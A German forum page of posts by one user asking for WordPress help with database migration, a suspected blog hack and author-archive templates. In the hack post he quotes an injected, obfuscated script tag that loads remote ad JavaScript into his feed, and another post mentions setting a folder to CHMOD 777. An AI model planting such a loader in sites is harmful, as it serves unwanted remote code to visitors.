Beiträge von CallMeDude

    Danke gabbo für deine schnelle Antwort. Ich werde deinen Tipp bei Gelegenheit mal ausprobieren. Falls es abermals nicht funktionieren sollte, dann melde ich mich hier noch einmal.

    Edit:

    Ich habe jetzt meine neue, leere, anders heißende Datenbank mittels der Exportfunktion von Wordpress mit den Daten der alten Datenbank befüllt. Abgesehen von kleineren Fehlern (Kategorien waren manchmal doppelt, Links für die Blogroll wurden nicht übernommen) hat soweit alles geklappt. Nochmals vielen Dank für den Tipp gabbo.

    Servus miteinander,

    aufgrund eines Webspace-Provider Wechsel habe ich folgendes Problem. Auf meinem neuen Webspace habe ich eine Neuinstallation von Wordpress (v2.8.4) draufgespielt (hat funktioniert, die Willkommen-Testseite wurde angezeigt). Ich musste über die Web-Admin-Oberfläche eine neue Wordpress-Datenbank anlegen, bei der ich aber leider weder den Namen der Datenbank (Präfix) noch des Users für die Datenbank (entspricht Namen der Datenbank) ganz frei wählen kann, d.h. meine neue, leere Wordpress-Datenbank hat jetzt einen anderen Namen und einen andern Benutzername als meine alte Wordpress-Datenbank bei meinem alten Webspace. In der 'wp-config.php'-Datei stehen die Datenbankdaten zur neuen Datenbank. Über die Exportfunktion von phpMyAdmin habe ich ein Backup von meiner alten Datenbank gemacht und dieses dann per Importfunktion von phpMyAdmin in die neue Datenbank überspielt (die Datenbank hat immer noch den neuen Namen, aber mit den Einträgen der alten Datenbank). Beim Importieren gab's keine Fehlermeldung. Leider wird aber die Willkommen-Testseite nicht mehr angezeigt und ich komme auch nicht mehr ins Wordpress-Dashboard (bekomme nicht einmal ein Benutzer-Login-Fenster). Ich vermute, dass ich einige Einträge in der Datenbank per Hand ändern muss, nur weiß ich nicht welche. Oder war meine ganze Methode schon im Vorhinein zum Scheitern verurteilt und ich hätte einen anderen Weg einschlagen müssen? Falls mir jemand helfen könnte, wäre ich sehr dankbar.

    Gruß Dude

    Hallo miteinander,

    sorry wenn ich mit meinem Beitrag nerve, denn ich weiß, dass es bereits so eine Hack-Threads gibt. Ich habe mir ein paar dieser Threads auch durchgelesen und ein paar Sachen ausprobiert, aber leider bin ich jetzt mit meinem Latein am Ende (zudem bin ich auch kein Programmiersprachenchecker) und muss doch mal hier nachfragen.

    ich habe diesen Blog hier (Domain-Alias, Wordpress Version ist jetzt 2.8.1) und vermute, dass er gehackt wurde. Schon seit ein paar Monaten hatte ich immer mal wieder ein 'Euros4Click'-Werbefenster (nennt man das jetzt Pop-Up, Banner, Layer-Ad? Das Fenster schiebt sich von unten in die Mitte des Bildschirmfensters, wo man es dann schließen muss und sich danach manchmal ein zweites Werbefenster öffnet) auf meinen Blogseiten gehabt. Zunächst dachte ich, dass mein Webspace-Anbieter jetzt Werbung bei allen kostenlosen Webspace-Usern geschaltet hat. Dann fand ich heraus, dass meine Feeds nicht mehr funktionieren. Der Feed Validator brachte folgendes heraus:

    Code
    [URL="http://feedvalidator.org/check.cgi?url=http%3A%2F%2Fcallmedude.menkisys.net%2Fwordpress%2Ffeed#l482"]line 482[/URL], column 0: XML parsing error: <unknown>:482:0: junk after document element [[URL="http://feedvalidator.org/docs/error/SAXError.html"]help[/URL]]
    
    
    [LIST=1]
    [*]<script Language="JavaScript">
    [*]document.write ('<scr' + 'ipt Language="JavaScript" src="http://www.euros4click.de/showme.php?id=25434&rnd=' + Math.random() + '"></scr' + 'ipt>');
    [*]</script>
    [/LIST]

    Als dann auch noch Werbebanner auf der Wordpress-Adminseite (Dashboard) auftauchten, verstärkte sich mein Verdacht, dass es sich hier um einen Hack handeln muss. Ich installierte das WP Antivirus Plugin, aber leider konnte nichts gefunden werden. Danach probierte ich das Exploit Scanner Plugin aus, das einige verdächtige Dateien fand. Ich machte ein Backup von meinen Wordpress-Dateien und meiner Datenbank und löschte meinen kompletten Wordpress-Ordner. Ich installierte Wordpress komplett neu und nur die '.htacess'-Datei von meiner alten Wordpress-Version übernahm ich (die 'wp-config'-Datei schrieb ich neu mit den vier Sicherheitsschlüssel), d.h. für mich, dass nur meine alte Datenbank von meiner alten Wordpress-Version übrig blieb. Ich installierte noch nicht wieder meine Themes oder Plugins und probierte aus, ob der Hack noch da ist. Ich bekam wieder Werbung auf meinen Admin-Seiten (gelegentlich auch auf den Blogseiten) und die Feeds gingen immer noch nicht (das später installierte Antivirus Plugin fand wieder nichts und der Exploit Scanner brachte dieselben verdächtigen Dateien). Ich ging davon aus, dass dies bedeutet, dass der Hack nicht in einem Theme oder Plugin ist (deswegen habe ich sie später wieder auf meine neue Wordpress-Version installiert), sondern vermutlich in meiner Datenbank ist. Ich untersuchte meine Datenbank mittles PHPMyAdmin nach verdächtigen Einträgen wie 'Euros4Click', aber selbstverständlich fand ich nichts (wäre auch zu einfach gewesen, vermutlich ist solches Zeug ja codiert). Ein weiterer Versuch von mir war, dass ich abgespeicherte Artikelüberarbeitungen (Revisionen) zu den einzelnen Posts gelöst habe, falls sich dort der schadhafte Code verstecken sollte. Ich löste auch zwei Datenbank Tabels, die zu einem alten, nicht mehr verwendeten Plugin gehört haben.

    Leider habe ich keine Ahnung, wonach ich in meiner Datenbank suchen muss oder was ich sonst noch unternehmen kann, um diesen Hack loszuwerden. Naürlich könnte ich noch die Präfixe der Tabels und den 'Admin'-User umbenennen, aber dies würde mich ja nicht von dem Hack befreien oder? Hat irgendjemand einen Rat für mich und kann mir bestätigen, dass dies ein Hack ist?

    Servus Leute,

    ich bin neu hier und auch nicht gerade ein Könner von PHP & Co. Mein Blog benutzt das Wordpress Default Kubrik Theme in der DE-Edition (ich habe nur Änderungen bei den Hintergrundgrafiken und Farben gemacht). Ich habe auch das hier besprochene Userpic & Avatar Plugin bei mir installiert. Zusätzlich habe ich noch das List Authors Widget von Mike Smullin bei mir installiert. Dieses Widget geniert mir eine Autorenliste in der Sidebar. Wenn man auf den Namen eines Autors klickt, kommt man zum Autoren-Archiv des User mit allen seinen Artikel. Ich würde gerne bei dem jeweiligen Autoren-Archiv einen kurzen Satz (z.B. Alle Artikel von 'Name des Autors') und das entsprechende Userpic mir anzeigen lassen wollen.

    Mein Versuch war in der archive.php Datei folgende zwei Zeilen in den Code reinzuschreiben:

    Leider hat dies nicht geklappt. Es wurden die drei Worte 'Alle Artikel von' geschrieben, aber kein Autorenname und auch kein Userpic tauchten bei mir auf. Wenn ich diese beiden Zeilen aber z.B. in die single.php Datei reinschreibe, dann klappt alles wunderbar (Autorenname und Userpic werden angezeigt).

    Was habe ich falsch gemacht? Warum werden die PHP-Befehle nicht erkannt? Muss ich den Code an einer anderen Stelle einfügen?

    Ein weiteres anderes Problem bei mir ist das Default-Avatar-Bild eines anonymen Kommentators. Ich habe zwar ein passendes Avatar-Bild (erfüllt Größenvorgaben) in den avatars-Order hochgeladen (mit Zugriffsrecht CHMOD 777) und auch bei den Plugin-Einstellungen den Dateiname angegeben (mal mit / mal ohne jpg-Endung), aber es wird kein Default-Avatar-Bild angezeigt. Die Avatare der registrierten Autoren hingegen werden in den Kommentaren angezeigt.

    Für eine Antwort eurerseits wäre ich sehr dankbar. Ich hoffe, dass jemand von euch mir helfen kann.

    Gruß Dude

    Edit:

    Die Probleme haben sich erledigt. Ich habe sich glücklicherweise im Nachhinein selber lösen können.